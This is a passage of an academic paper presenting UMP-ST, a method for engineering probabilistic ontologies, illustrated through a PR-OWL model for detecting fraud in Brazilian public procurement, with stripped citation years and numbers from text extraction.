ump-st lies in its ability to support a complex system development effort that extends over a long period of time and requires significant resources to implement. 
besides the large number of uncontrolled variables, the resources to implement a single case of sufficient complexity is difficult; experimentation requiring multiple parallel implementations is prohibitive. nevertheless, the experience of our development team is that the structure provided by ump-st was essential to the ability to capture the expert’s knowledge in a model whose results were a reasonable match to the expert’s judgments. the paper is organized as follows. the next section reviews existing design methodologies that provided inspiration for ump-st. the following section introduces the ump-st. next, we introduce our use case devoted to identifying fraud in public procurement in brazil. the fifth section explains the four disciplines of the ump-st in the context of the fraud use case, and is followed by a section discussing applicability of the ump-st to other domains. the paper concludes with a section on future work and a final section presenting our concluding remarks. related work successful development of any complex system requires following a structured, systematic process for design, implementation and evaluation. existing software and systems carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. engineering processes are useful as starting points, but must be tailored for engineering a probabilistic ontology. the ump-st draws upon a number of related processes for software engineering, ontology engineering, and bayesian network engineering to provide a process tailored to probabilistic ontology engineering. to provide a context for introducing the ump-st, this section reviews related literature on design processes that provided an initial basis for tailoring the ump-st. the unified process the unified process (up) is a widely applied software engineering process (jacobson, booch & rumbaugh, ; kruchten, ; balduino, ). it has three main characteristics: ( ) it is iterative and incremental; ( ) it is architecture centric; and ( ) it is risk focused. each project is divided into small chunks, called iterations, each concluding in delivery of executable code. these frequent deliverables yield an incremental implementation of the system. a key deliverable is the executable architecture, which is a partial implementation of the system that validates the architecture and builds the foundation of the system. finally, the up mitigates risk by prioritizing the highest risk features for early implementation. the reasoning is simple: if a critical aspect of the system is going to fail, it is better to discover this early enough to rework the design or cancel the project, than to realize after the fact that large amounts of resources have been wasted on a non-viable project. the up defines the project lifecycle as composed of four phases: ( ) inception; ( ) elaboration; ( ) construction; and ( ) transition. inception is usually the shortest phase. the main goal is to define the justification for the project, its scope, the risks involved, and the key requirements. in the elaboration phase, the primary concerns are to define most of the requirements, to address the known risks, and to define and validate the system architecture. the construction phase is the longest phase, where most of the development process resides. this phase is usually broken down into small iterations with executable code being delivered at the end of each iteration. 
finally, in the transition phase the system is deployed, the users are trained, and initial feedback is collected to improve the system. to support the project lifecycle, the up defines several disciplines or workflows. each discipline describes a sequence of activities in which actors or workers produce products or artifacts to achieve a result of observable value. for example, a developer might carry out a programming activity using the system specification in order to produce both source and executable code. there are several variations of the unified process (e.g., rational unified process, agile unified process, enterprise unified process). while each has its own set of disciplines, the following disciplines are common to most: business modeling, responsible for documenting the business processes in a language common to both business and software communities; requirements, responsible for defining what the system should do based on the information gathered from the customer; analysis & design, responsible for showing how the system will be realized in the implementation phase; implementation, responsible for developing the code necessary to implement the elicited requirements; test, which verifies and validates the code developed; and deployment, responsible for delivering the software to the end user. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ontology engineering according to gomez-perez, corcho & fernandez-lopez ( ), the first workshop on ontological engineering was held in conjunction with the th european conference on artificial intelligence in . since then, several methodologies for building ontologies have been proposed. gomez-perez, corcho & fernandez-lopez ( ) compare several different method- ologies used for building ontologies in the context of the methontology ontology development process (fernández-lópez, gómez-pérez & juristo, ). methontology identifies activities that are performed to build ontologies. the three main activity categories are: ( ) ontology management activities; ( ) ontology development oriented activities; and ( ) ontology support activities. the ontology management activities include: ( ) scheduling, which identifies activities, their dependency, the resources needed in each, and how long they will take; ( ) control, which guarantees that the project is going according to schedule; and ( ) quality assurance, which verifies if the products generated from the scheduled activities are satisfactory. these activities are general enough that they can be imported from other frameworks that are not specific to ontology engineering, such as the project management body of knowledge (pmbok), which is a general guide to project management. pmbok includes activities such as scheduling, control, among others (project management institute, ). because these are generic activities, it is not surprising that only one, the on-to-knowledge (otkm) methodology (sure, staab & studer, ), out of seven methodologies analyzed and compared by gomez-perez, corcho & fernandez-lopez ( ) describes these activities in detail. the methontology methodology only proposes these activities, but does not describe them in detail. the ontology development oriented activities are divided into three different steps: ( ) pre-development; ( ) development; and ( ) post-development activities. 
pre-development involves: ( a) an environment study to understand where the ontology will be used, which applications will use it, etc.; and ( b) a feasibility study in order to assess if it is worthwhile, feasible, and cost-effective to build this ontology. although these are important activities, they are not addressed in most of the methodologies for building ontologies. according to gomez-perez, corcho & fernandez-lopez ( ) only the methontology methodology proposes the environment study and describes the feasibility study. development activities include: ( a) the specification activity, which describes why the ontology is being built, its purpose, etc.; ( b) the conceptualization activity, which describes and organizes the domain knowledge; ( c) the formalization activity, which evolves the conceptual model into a more formal model; and ( d) the implementation activity, which creates the desired ontology in the chosen language. as expected, these are the main activities addressed by the ontology engineering methodologies. the methodologies analyzed by gomez-perez, corcho & fernandez-lopez ( ) proposed or described most of these development activities, with the exception of cyc (reed & lenat, ), which only addresses the implementation activity and does not mention the others. post-development activities involve ( a) maintenance, which updates and fixes the ontology, and ( b) (re)use of the ontology being developed by other ontologies and carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. applications. these are also important activities; however, most of the methodologies only address them as a natural step during the ontology’s life cycle, which can be incremental, producing a sequence of evolving prototypes. none of the methodologies presented by gomez-perez, corcho & fernandez-lopez ( ) describes these activities. only the methontology and otkm methodologies propose some of these activities, but do not provide much detail. finally, ontology support activities include: ( ) knowledge acquisition, which extracts domain knowledge from subject matter experts (smes) or through some automatic process, called ontology learning; ( ) evaluation, in order to validate the ontology being created; ( ) integration, which is used when other ontologies are used; ( ) merging, which is important for creating a new ontology based on a mix of several other ontologies from the same domain; ( ) alignment, which involves mapping different concepts to/from the involved ontologies; ( ) documentation, which describe all activities completed and products generated for future reference; and ( ) configuration management, which controls the different versions generated for all ontologies and documentation. out of the seven methodologies compared by gomez-perez, corcho & fernandez-lopez ( ), five neither propose nor mention configuration management, merging, or alignment. the integration activity is proposed by six of them, but not described in detail. the knowledge acquisition and documentation activities are proposed by three and described by two, while the evaluation activity is proposed and described by two in detail. probability elicitation the literature on eliciting probabilities from experts has a long history (e.g., winkler, ; huber, ; wallsten & budescu, ). 
at the interface between cognitive science and bayesian probability theory, researchers have examined biases in unaided human judgment (e.g., kahneman, slovic & tversky, ) and have devised ways to counteract those biases (e.g., clemen & reilly, ; burgman et al., ). several authors have defined structured processes or protocols for eliciting probabilities from experts (e.g., clemen & reilly, ; garthwaite, kadane & o’hagan, ). there is general agreement on the steps in the elicitation process. the seven steps described by clemen & reilly ( ) are: understanding the problem; identifying and recruiting experts; motivating the experts; structuring and decomposition; probability and assessment training; probability elicitation and verification; and aggregating the probabilities. a recent comprehensive reference for probability elicitation is o’hagan et al. ( ). the advent of graphical probability models (pearl, ) has created the problem of eliciting the many probabilities needed to specify a graphical model containing dozens to hundreds of random variables (cf., druzdzel & van der gaag, ; renooij, ). mahoney & laskey ( ) defined a systematic process for constructing bayesian network models. their process considered elicitation of structural assumptions as well as probability distributions. it is an iterative and incremental process that produces a series of prototype models. the lessons learned from building each prototype model are used to identify requirements for refining the model during the next cycle. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. uncertainty modeling process for semantic technology the process of creating and using a probabilistic ontology typically occurs in three stages: first is modeling the domain; next is populating the model with situation-specific information; and third is using the model and situation-specific information for reasoning. modeling a domain means constructing a representation of aspects of the domain for purposes of understanding, explaining, predicting, or simulating those aspects. for our purposes, the model represents the kinds of entities that can exist in the domain, their attributes, the relationships they can have to each other, the processes in which they can participate, and the rules that govern their behavior. it also includes uncertainties about all these aspects. there are many sources of uncertainty: e.g., causes may be non- deterministically related to their effects; events may be only indirectly observable through noisy channels; association of observations to the generating events may be unknown; phenomena in the domain may be subject to statistical fluctuation; the structure of and associations among domain entities may exhibit substantial variation; and/or the future behavior of domain entities may be imperfectly predictable (e.g., schum & starace, ; laskey & laskey, ; costa et al., ). once these and other relevant sources of uncertainty are captured in a domain model, the model can be applied to a specific situation by populating it with data about the situation. finally, the inference engine can be called upon to answer queries about the specific situation. unlike traditional semantic systems that can handle only deterministic queries, queries with a probabilistic ontology can return soft results. for example, consider a query about whether an inappropriate relationship exists between a procurement official and a bidder. 
a reasoning system for a standard ontology can return only procurements in which such a relationship can be proven, while a reasoner for a probabilistic ontology can return a probability that such a relationship exists. the ump-st is an iterative and incremental process, based on the up, for designing a probabilistic ontology. while up serves as the starting point, ump-st draws upon and is consistent with the ontology engineering and probability elicitation processes described in the previous sections, thus tailoring the up for probabilistic ontology design. as shown in fig. , the ump-st includes all phases of the up, but focuses only on the requirements, analysis & design, implementation, and test disciplines. the figure depicts the intensity of each discipline during the ump-st. like the up, ump-st is iterative and incremental. the basic idea behind iterative enhancement is to model the domain incrementally, allowing the modeler to take advantage of what is learned during earlier iterations of the model in designing and implementing later iterations. for this reason, each phase includes all four disciplines, but the emphasis shifts from requirements in the earlier phases toward implementation and test in the later phases. note that testing occurs even during the inception phase, prior to beginning the implementation phase. this is because it is usually possible to test some aspects of the model during the analysis & design carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure uncertainty modeling process for semantic technology (ump-st). stage prior to implementation. it is well known that early testing reduces risk, saves cost, and leads to better performance (incose, ). figure presents the probabilistic ontology modeling cycle (pomc). this cycle depicts the major outputs from each discipline and the natural order in which the outputs are produced. unlike the waterfall model (royce, ), the pomc cycles through the steps iteratively, using what is learned in one iteration to improve the result of the next. the arrows reflect the typical progression, but are not intended as hard constraints. indeed, it is possible to have interactions between any pair of disciplines. for instance, it is not uncommon to discover a problem in the rules defined in the analysis & design discipline during the activities in the test discipline. as a result, the engineer might go directly from test to analysis & design in order to correct the problem. in fig. , the requirements discipline (blue box) defines the goals that must be achieved by reasoning with the semantics provided by our model. usually, when designing a po, one wants to be able to automate a reasoning process that involves uncertainty. by goals, we mean the kinds of questions the user wants the system to be able to answer via the po reasoning. for instance, one of the main goals in the procurement fraud domain is to be able to answer with a certain degree of certainty whether a procurement presents any signs of fraud. however, this type of question is not straight-forward to answer. thus, the system will typically need to evaluate a set of more specific questions, or queries, in order to better assess the probability of having fraud. furthermore, in order to answer these more specific queries, the system will need some evidence. these goals, queries, and evidence comprise the requirements for the model being designed. 
the analysis & design discipline (green boxes) describes classes of entities, their attributes, how they relate to each other, and what rules apply to them in our domain. these definitions are independent of the language used to implement the model. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure probabilistic ontology modeling cycle (pomc)—requirements in blue, analysis & design in green, implementation in red, and test in purple. the implementation discipline (red boxes) maps the design to a specific language that is both semantically rich and capable of representing uncertainty. this means encoding the classes, attributes, relationships and rules in the chosen language. for our case study, the mapping is to pr-owl (carvalho, laskey & costa, ; costa, laskey & laskey, ), but other semantically rich uncertainty representation languages could also be used (e.g., cozman & mauá, ). finally, the test discipline (purple box) is responsible for evaluating whether the model developed during the implementation discipline is behaving as expected from the rules defined during analysis & design and whether the results achieve the goals elicited during the requirements discipline. as noted previously, it is a good idea to test some of the rules and assumptions even before implementation. this is a crucial step to mitigate risk. early testing can identify and correct problems before significant resources have been spent developing a complex model that turns out to be inadequate. like several of the ontology engineering processes considered by gomez-perez, corcho & fernandez-lopez ( ), the ump-st does not cover ontology management, under the assumption that these activities can be imported from other frameworks. although the ump-st does not cover maintenance and reuse, its iterative nature supports incremental evolution of the developed ontology. of the ontology support activities described by gomez-perez, corcho & fernandez-lopez ( ), the ump-st process explicitly addresses only the test discipline, which is similar to the evaluation activity. by following the steps in the ump-st, the ontology designer will be generating the documentation needed in order to describe not only the final po, but also the whole process of building it. this carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. supports the documentation activity of gomez-perez, corcho & fernandez-lopez ( ). like most ontology engineering processes, the ump-st does not address the ontology support activities of integration, merging, and alignment. the primary focus of the ump-st is the ontology development activities. because it is based on the up, it uses a different nomenclature than gomez-perez, corcho & fernandez-lopez ( ), but there is a close resemblance: the specification activity is similar to the requirements discipline; the conceptualization and formalization activities are similar to the analysis & design discipline; and the implementation activity is similar to the implementation discipline. the major difference between the methodologies reviewed by gomez-perez, corcho & fernandez-lopez ( ) and the ump-st is the focus. 
while gomez-perez, corcho & fernandez-lopez ( ) focus on ways to build a glossary of terms, build taxonomies, and define concepts, properties, and deterministic rules the ump-st presents techniques to identify and specify probabilistic rules, define dependency relations between properties based on these rules, and quantify the strength of these relations as parameters of local probability distributions. thus, the ump-st extends other methodologies used for building ontologies, and should coexist with these methodologies. when creating deterministic parts of the ontology the user can follow existing methodologies proposed for standard ontology building. to incorporate uncertainty and therefore extend to a probabilistic ontology, the user can follow the steps defined in the ump-st process. similarly, the ump-st can and should coexist with processes for eliciting probabilities, such as those defined by clemen & reilly ( ) and o’hagan et al. ( ). the probabilistic ontology engineer should refer to these resources when defining a protocol for eliciting probabilities from experts. in the next two sections, the ump-st process and the pomc are illustrated through a case study in procurement fraud detection and prevention. the case study walks step-by-step through the activities that must be executed in each discipline in the pomc. the case study has been kept simple enough for clear exposition of pomc, while being complex enough to convey key issues that arise in real-world ontology engineering. implementation and plausible reasoning were carried out using the unbbayes probabilistic ontology environment (carvalho, ; matsumoto et al., ). preventing and detecting procurement fraud in brazil in brazil, the main law that details the regulation of the public procurement process is the federal law , / (public procurement law). the public procurement procedures are also mentioned in section xxi, article of the federal constitution. the public procurement law is applicable not only to the federal government, but also to the state and municipal governments. although it is meant to provide just general guidelines, it is so detailed that there is little room for the states and municipalities to further legislate (frizzo & oliveira, ). the public procurement law regulates public procurement procedures and contracts involving the government. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the public procurement law defines three main procurement procedures: invitation to tender, which is a simpler and faster procedure where at least three competitors are invited to participate in the tender based on the request for proposals (rfp), which is not required to be advertised in the press; price survey, which requires the competitors to be previously registered before the public tender and requires a broader advertising of the rfp in the newspaper and official press; and competition, which is the most complex and longest procedure, allowing participation of all companies that meet the qualification criteria on the first day of the procedure and requiring more general advertising of the rfp as the price survey. in addition, law , / created the reverse auction, which involves alternative bids from the participating companies in the competitive phase, before the qualification documents are analyzed. 
nowadays, the most common procedure for the acquisition of common goods and services is the electronic reverse auction, which is the same as the reverse auction, but the procedure happens in an electronic system. its rfp must also be advertised in the official press as well as through the internet. the criteria for selecting the best proposal are defined in the rfp by the regulated agency. there are three main types of rules that must be followed: best price, where the company that presents the best bid and meets the minimum requirements is awarded the contract; best technique, where the company with the best technical solutions wins regardless of price; and a mix of the two, where scores are given for both price and technique and the company with the highest joint score wins. frizzo & oliveira ( ) provide additional detail on thresholds for determining whether a contract is subject to the public procurement law, freedom to choose which procedure to use, changes to an existing contract, and other aspects of the public procurement process in brazil. the procurement process presents many opportunities for corruption. although laws attempt to ensure a competitive and fair process, perpetrators find ways to turn the process to their advantage while appearing to be legitimate. to aid in detecting and deterring such perversions of the procurement process, a specialist, who helped in this work, has didactically structured different kinds of procurement fraud encountered by the brazilian office of the comptroller general (cgu, controladoria-geral da união, in portuguese) over the years. these different fraud types are characterized by criteria, such as business owners working as a front for the company or use of accounting indices that are not commonly employed. indicators have been established to help identify cases of each of these fraud types. for instance, one principle that must be followed in public procurement is that of competition. a public procurement should attempt to ensure broad participation in the bidding process by limiting requirements on bidders to what is necessary to guarantee adequate execution of the contract. nevertheless, it is common to have a fake competition in which different bidders are, in fact, owned by the same person. this is usually done by having someone act as a front for the enterprise. an indicator that a bidder may be a front is that the listed owner has little or no education. thus, an uneducated owner is a red flag suggesting that there may be a problem with the procurement. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. gregorini ( ) identified a number of red flags that can be considered evidence of fraud. these include: concentration of power in the hands of a few people; rapid growth in concentration of goods and services contracted from a single company; competition restriction; transfer of funds to a non governmental organization (ngo) close to elections; and others. while these factors are evidence of potential irregularities, they are not definitive indicators. a list of more serious and determinant conditions is presented by flores ( ). these include: choosing directors based on a political agenda; negotiating contracts in order to reserve money for an election campaign; negotiating contracts in order to favor friends and family; bribery in order to obtain certain privileges; and providing inside information. 
a more formal definition of different types of fraud found in brazil is presented by oliveira ( ). he presents three main groups of fraud, based on recent scandals in brazil: frauds initiated by passive agents; frauds initiated by active agents; and frauds that represent collusion. the first is when an agent from the public administration, acting in his public function, favors someone or himself by performing illicit actions (e.g., purchasing products that were never used, falsification of documents and signatures, favoring friends and family). the second is when an active agent, a person or a company, outside the public administration tries to corrupt an agent that works in the public administration or does something illegal in order to cheat the procurement process (e.g., acting as a front for a company, delivering contraband products, giving money to civil servants in order to favor a specific company). finally, the third is when there is some type of collusion between companies participating in the procurement process or even between passive and active agents (e.g., delivering and accepting just part of the goods purchased, paying before receiving the merchandise, overpricing goods and services, directing and favoring a specific company in exchange for some financial compensation). the types of fraud presented by oliveira ( ), although focused on the brazilian context, are consistent with more recent work from dhurandhar et al. ( b). this work, which presents a more general fraud taxonomy related to procurement fraud, was registered as a patent in (dhurandhar et al., a). while oliveira talks about passive and active agents, dhurandhar et al. talks about fraud by employees and fraud by vendors, respectively. however, these fraud definitions do have a few differences. for example, while dhurandhar et al. differentiate collusion among vendors and collusion between employee and vendors, oliveira classifies both as simply collusion. formalizing knowledge about fraud in a computable form can lead to automated support for fraud detection and prevention. specifically, analysts at the cgu must sift through vast amounts of information related to a large number of procurements. automated support can improve analyst productivity by highlighting the most important cases and the most relevant supporting information. the ultimate goal of the procurement fraud probabilistic ontology is to structure the specialist’s knowledge to enable automated reasoning from indicators to potential fraud types. such an automated system is intended to support specialists and to help train new specialists, but not to replace them. automated support for this task requires a semantically rich representation that supports uncertainty management. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as a case study, carvalho ( ) developed a proof-of-concept probabilistic ontology covering part of the procurement fraud domain. this paper uses a portion of this case study to illustrate how the pomc can support the creation of a po. the full implementation and code for the case study is presented in carvalho ( ) and is provided as supplemental information. this proof-of-concept implementation represents only a fragment of the specialist’s knowledge of the procurement fraud domain. the plan is eventually to extend this po to a full representation of the specialist’s knowledge. 
ump-st for procurement fraud this section describes in detail the four disciplines in the ump-st process and their application to the procurement fraud case study. to facilitate the understanding of each discipline, we alternate between describing the discipline and illustrating its application to the public procurement fraud detection and prevention use case. requirements the pomc begins with the requirements discipline (r. in fig. ). the requirements discipline defines the objectives that must be achieved by representing and reasoning with a computable representation of domain semantics. for this discipline, it is important to define the questions that the model is expected to answer, i.e., the queries to be posed to the system being designed. for each question, a set of information items that might help answer the question (evidence) must be defined. requirements can be categorized as functional and non-functional (wiegers, ; sommerville, ). functional requirements concern outputs the system should provide, features it should have, how it should behave, etc. in our case, functional requirements relate to the goals, queries, and evidence that pertain to our domain of reasoning. non-functional requirements, on the other hand, address criteria relating to performance of the system as a whole. for instance, in our use case a non-functional requirement could be that a given query has to be answered in less than a minute. another example is that the posterior probability given as an answer to a given query has to be either exact or an approximation with an error bound of ± . %. non-functional requirements are typically not specific to probabilistic ontology development. we therefore focus here on how to develop functional requirements for our use case. we focus on a subset of our procurement use case to illustrate how a requirement is carried through the po development cycle until it is eventually implemented and tested. to understand the requirements associated with this subset, we first have to explain some of the problems encountered when dealing with public procurements. one of the principles established by law no. , / is equality among bidders. this principle prohibits the procurement agent from discriminating among potential suppliers. however, if the procurement agent is related to the bidder, he/she might feed information or define new requirements for the procurement in a way that favors the bidder. another problem arises because public procurement is quite complex and may involve large sums of money. therefore, members forming the committee for a procurement must both be well prepared, and have a clean history with no criminal or administrative carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. convictions. this latter requirement is necessary to satisfy the ethical guidelines that federal, state, municipal and district government employees must follow. the above considerations give rise to the following set of goals, queries, and evidence: . goal: identify whether a given procurement violates fair competition policy (i.e., evidence suggests further investigation and/or auditing is warranted); (a) query: is there any relation between the committee and the enterprises that participated in the procurement? i. 
evidence: committee member and responsible person of an enterprise are related (mother, father, brother, or sister); ii. evidence: committee member and responsible person of an enterprise live at the same address. . goal: identify whether the committee for a given procurement has improper composition. (a) query: is there any member of committee who does not have a clean history? i. evidence: committee member has criminal history; ii. evidence: committee member has been subject to administrative investigation. (b) query: is there any relation between members of the committee and the enterprises that participated in previous procurements? i. evidence: member and responsible person of an enterprise are relatives (mother, father, brother, or sister); ii. evidence: member and responsible person of an enterprise live at the same address. in defining requirements, the availability of evidence must be considered. for example, information about whether persons are related might be drawn from a social network database; evidence about criminal history might come from a police database; an evidence about cohabitation might be drawn from an address database. one important role for semantic technology is to support interoperability among these various data sources and the fraud detection model. another important aspect of the requirements discipline is defining traceability of requirements. according to gotel & finkelstein ( ), ‘‘requirements traceability refers to the ability to describe and follow the life of a requirement, in both the forward and backward directions.’’ a common tool for traceability is a specification tree, in which each requirement is linked to its ‘‘parent’’ requirement. a specification tree for the requirements for our procurement model is shown in fig. . in this hierarchy, each item of evidence is linked to a query it supports, which in turn is linked to its higher level goal. this linkage supports requirements traceability. in addition to the hierarchical decomposition of the specification tree, requirements should also be linked to work products of other disciplines, such as the rules in the analysis & design discipline, or goals, queries, and evidence elicited in the requirements discipline. these links provide traceability that is essential to validation and management of change. subsequent sections show how ump-st supports requirements tracing. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. every brazilian citizen is required to file tax information, even if only to state that his or her income is below a certain amount and no taxes are owed. figure specification tree for procurement model requirements. analysis & design once we have defined our goals and described how to achieve them, it is time to start modeling the entities, their attributes, relationships, and rules to make that happen. this is the purpose of the analysis & design discipline. the major objective of this discipline is to define the semantics of the model. in fact, much of the semantics can be defined using traditional ontologies, including the deterministic rules that the concepts described in our model must obey. the focus of this paper is on representing uncertain aspects of the domain. information on defining traditional ontologies can be found in allemang & hendler ( ) and gomez-perez, corcho & fernandez-lopez ( ). 
the first step in defining the domain model is to define the classes and relationships that are important to represent for the procurement fraud detection problem (ad. in fig. ). for our case study, we use the unified modeling language (uml) (rumbaugh, jacobson & booch, ) for this purpose. analysis & design also includes developing rules (ad. in fig. ). because uml is insufficiently expressive to represent complex rule definitions, we record the deterministic rules separately for later incorporation into the pr-owl probabilistic ontology. while experienced ontology engineers might prefer to define classes, relationships and rules directly in owl, we chose uml for its popularity, understandability, ease of communication with domain experts, and widely available and usable software tools. we see uml-style diagrams as a way to capture knowledge about classes and relationships that could be automatically translated into an owl ontology or pr-owl probabilistic ontology (cf., gasevic et al. ( )). figure depicts a simplified model of the classes and relationships in the procurement fraud domain (figure: entities, their attributes, and relations for the procurement model). a person has a name, a mother and a father (also person). every person has a unique identification that in brazil is called the cpf. a person also has an education and livesat a certain address. in addition, everyone is obliged to file his/her taxinfo every year, including his/her annualincome. these entities can be grouped as personal information. a publicservant is a person who worksfor a publicagency, which is a government agency. every public procurement is owned by a publicagency, has a committee formed by a group of publicservants, and has a group of participants, which are enterprises. one of these will be the winner of the procurement. eventually, the winner of the procurement will receive a contract of some value with the publicagency that owns the procurement. the entities just described can be grouped as procurement information. every enterprise has at least one person that is responsible for its legal acts. an enterprise also has an identification number, the general list of contributors (cgc), and an issuspended attribute, which can be used to state that the enterprise is suspended from procuring with the public administration. these are grouped as the enterprise information. we also have administrativeinvestigation, which has information about investigations that involve one or more publicservants. its finalreport, the judgmentadministrativereport, contains information about the penalty applied, if any. these entities form the administrative judgment information. finally, we have the criminal judgment information group, which describes the criminalinvestigation that involves a person, with its finalreport, the judgmentcriminalreport, containing information about the verdict. notice that just a subset of this uml model is of interest to us in this paper, since we are dealing with just a subset of the requirements presented in carvalho ( ). in addition to the cardinality and uniqueness rules defined above for the entities depicted in fig. , the ad. step in fig. includes specifying probabilistic rules to address the requirements defined in the r. step. these include:
if a member of the committee has a relative (mother, father, brother, or sister) responsible for a bidder in the procurement, then it is more likely that a relation exists between the committee and the enterprises, which inhibits competition. . if a member of the committee lives at the same address as a person responsible for a bidder in the procurement, then it is more likely that a relation exists between the committee and the enterprises, which lowers competition. . if or , then the procurement is more likely to violate policy for fair competition. . if a member of the committee has been convicted of a crime or has been penalized administratively, then he/she does not have a clean history. if he/she was recently investigated, then it is likely that he/she does not have a clean history. . if the relation defined in and is found in previous procurements, then it is more likely that there will be a relation between this committee and future bidders. . if or , then it is more likely that the committee violates policy for proper committee composition. typically the probabilistic rules are described initially using qualitative likelihood statements. implementing a probabilistic ontology requires specifying numerical probabilities. probability values can be elicited from domain experts (e.g., druzdzel & van der gaag, ; o’hagan et al., ) or learned from observation. the growing literature in statistical relational learning (e.g., getoor & taskar, ) provides a wealth of methods for learning semantically rich probability models from observations. in the analysis & design stage, information is identified for specifying the probability distributions (expert judgment and/or data sources). this information is encoded into the target representation during the implementation stage. the traceability matrix of table depicts how the probabilistic rules defined above are traced to the goals, queries and evidence items defined in the requirements discipline. this traceability matrix is an important tool to help designers to ensure that all requirements have been covered. it also supports maintainability by helping ontology engineers to identify how requirements are affected by changes in the model. it is also important at this stage to trace each of the rules to the source of information used to define the rule (e.g., notes from interview with expert, training manual, policy document, data source). another important step in the analysis & design discipline is to form natural groups of entities, rules, and dependencies (ad. in fig. ). this step facilitates the implementation discipline. the more complex the domain, the more important is the grouping activity. as shown in fig. , even in this simplified example there are five natural groups: ( ) personal information; ( ) procurement information; ( ) enterprise information; ( ) administrative judgment information; and ( ) criminal judgment information. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table traceability matrix relating rules to requirements. rule. rule. rule. rule. rule. rule. rq. x x x rq. .a x x rq. .a.i x rq. .a.ii x rq. x x x rq. .a x rq. .a.i x rq. .a.ii x rq. .b x rq. .b.i x rq. .b.ii x implementation once the analysis & design step has been completed, the next step is to implement the model in a specific language. how this discipline is carried out depends on the specific language being used. 
our case study was developed using the pr-owl probabilistic ontology language (costa, ; carvalho, ). pr-owl (pronounced ‘‘prowl’’) adds new definitions to owl to allow the modeler to incorporate probabilistic knowledge into an owl ontology. this section shows how to use pr-owl to express uncertainty about the procurement fraud domain. pr-owl uses multi-entity bayesian networks (mebn) (laskey, ) to express uncertainty about properties and/or relations defined on owl classes. a probability model is defined as a set of mebn fragments (mfrags), where each mfrag expresses uncertainty about a small number of attributes of and/or relationships among entities. a set of properly defined mfrags taken together comprise a mebn theory (mtheory), which can express a joint probability distribution over complex situations involving many entities in the domain. unlike most expressive probabilistic languages that assume the domain is finite (e.g., heckerman, meek & koller, ), an mtheory can express knowledge about an unbounded or even infinite set of entities. a properly defined pr-owl model expresses an mtheory, and thus expresses a global joint distribution over the random variables mentioned in the theory. for more detailed explanations on the key features of mebn logic, the reader should refer to laskey ( ). on a typical usage of a pr-owl probabilistic ontology, during execution time (e.g., in response to a query) a logical reasoning process would instantiate the mfrags that are needed to respond to the query. the result of this process is a situation-specific bayesian network (ssbn), which is a minimal bayesian network sufficient to obtain the posterior distribution for a set of target random variable instances given a set of finding random variable instances. in a pr-owl probabilistic ontology, the entity types correspond to owl classes, the attributes correspond to owl properties, and the relationships correspond to owl relations. thus, pr-owl allows the ontology designer to specify probability distributions to express uncertainty about properties and relations in an owl ontology. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure pr-owl entities for the procurement domain. the expressive power of mebn/pr-owl makes it an attractive choice for implementing probabilistic ontologies in complex domains. its compatibility with owl, a widely used ontology language, allows for the expression of uncertainty in existing owl ontologies, and for integrating pr-owl probabilistic ontologies with other ontologies expressed in owl. these are the primary reasons for the choice of mebn/pr-owl as the implementation language in our case study. the first step in defining a pr-owl probabilistic ontology for the procurement fraud domain is to represent the entities, attributes and relations of fig. as owl classes, properties and relations (i. in fig. ). our proof-of-concept made a few simplifications to the representation depicted in fig. . for example, we removed the publicservant entity and connected person directly to publicagency with the workfor relationship. as another simplification, we assumed that every person and enterprise instance is uniquely identified by its name, so there was no need to represent the cpf and cgc entities. fig. presents the entities as entered into our pr-owl ontology implemented in unbbayes (carvalho et al., ). after defining the entities, we consider characteristics that may be uncertain. 
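as a rough mental model of these constructs, the fragment below represents mfrags and an mtheory as plain data structures. it is an illustrative sketch only, not the pr-owl or unbbayes api; the field names are ours, and the example fragment lists the two personal-information rvs discussed next.

```python
# illustrative sketch (not the pr-owl/unbbayes api): an mfrag groups a few random
# variables; resident rvs get their local distributions here, input rvs are defined
# elsewhere, and context rvs state when the fragment applies. an mtheory is a set of
# properly defined mfrags that together define a joint distribution.
from dataclasses import dataclass
from typing import List


@dataclass
class MFrag:
    name: str
    context: List[str]    # constraints that must hold for the fragment to apply
    inputs: List[str]     # rvs whose distributions are defined in other mfrags
    residents: List[str]  # rvs whose local probability distributions live here


@dataclass
class MTheory:
    name: str
    mfrags: List[MFrag]

    def resident_rvs(self):
        return [rv for frag in self.mfrags for rv in frag.residents]


personal_info = MFrag(
    name="PersonalInfo",
    context=["isA(person1, Person)", "isA(person2, Person)"],
    inputs=[],
    residents=["livesAt(person1)", "isRelated(person1, person2)"],
)

print(MTheory("ProcurementFraud", [personal_info]).resident_rvs())
```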
